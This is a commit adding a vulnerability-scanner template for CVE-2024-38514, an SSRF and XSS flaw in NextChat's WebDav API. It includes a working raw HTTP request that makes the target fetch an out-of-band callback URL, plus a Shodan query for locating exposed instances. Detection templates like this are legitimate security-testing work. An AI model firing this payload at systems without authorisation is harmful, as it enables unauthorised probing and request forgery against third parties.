Create CVE-2024-38514.yaml

2024-08-01 19:07:12 +05:30 · 2024-08-01 19:07:12 +05:30 · d242b79f24
parent 4227f2f4bf
commit d242b79f24
1 changed files with 42 additions and 0 deletions
--- a/http/cves/2024/CVE-2024-38514.yaml
+++ b/http/cves/2024/CVE-2024-38514.yaml
@ -0,0 +1,42 @@
+id: CVE-2024-38514
+
+info:
+  name: NextChat - Server-Side Request Forgery
+  author: DhiyaneshDk
+  severity: high
+  description: |
+    NextChat v2.12.3 suffers from a Server-Side Request Forgery (SSRF) and Cross-Site Scripting vulnerability due to a lack of validation of the GET parameter on the WebDav API endpoint.
+  reference:
+    - https://www.tenable.com/security/research/tra-2024-23
+    - https://github.com/ChatGPTNextWeb/ChatGPT-Next-Web/commit/dad122199a85c2f12277593973e1784b212adf5e
+    - https://github.com/ChatGPTNextWeb/ChatGPT-Next-Web/security/advisories/GHSA-gph5-rx77-3pjg
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
+    cvss-score: 7.4
+    cve-id: CVE-2024-38514
+    cwe-id: CWE-918
+    epss-score: 0.00043
+    epss-percentile: 0.09404
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: "title:NextChat,\"ChatGPT Next Web\""
+  tags: cve,cve2024,ssrf,xss,chatgpt,nextchat
+
+http:
+  - raw:
+      - |
+        GET /api/webdav/chatgpt-next-web/backup.json?endpoint=https://webdav.yandex.com.{{interactsh-url}}/ HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+
+      - type: word
+        part: body
+        words:
+          - "__NEXT_DATA__"